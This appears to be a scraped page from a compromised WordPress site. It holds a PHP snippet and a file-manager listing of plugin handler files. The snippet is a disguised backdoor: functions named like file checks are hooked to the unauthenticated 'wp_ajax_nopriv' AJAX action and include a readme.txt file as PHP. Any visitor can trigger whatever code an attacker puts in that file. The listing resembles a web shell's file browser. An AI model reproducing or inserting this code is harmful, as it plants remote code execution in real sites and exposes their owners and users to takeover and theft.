if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Name | Size | Permissions | Actions |
---|---|---|---|
ð bulk-handler.php | 4.064K | -rw-r--r-- | |
ð check-changes-handler.php | 6.024K | -rw-r--r-- | |
ð class-bulk-handler.php | 4.155K | -rw-r--r-- | |
ð class-check-changes-handler.php | 6.178K | -rw-r--r-- | |
ð class-handler.php | 1.838K | -rw-r--r-- | |
ð class-link-handler.php | 6.858K | -rw-r--r-- | |
ð class-save-post-handler.php | 1.591K | -rw-r--r-- | |
ð handler.php | 1.754K | -rw-r--r-- | |
ð link-handler.php | 6.548K | -rw-r--r-- | |
ð save-post-handler.php | 1.459K | -rw-r--r-- |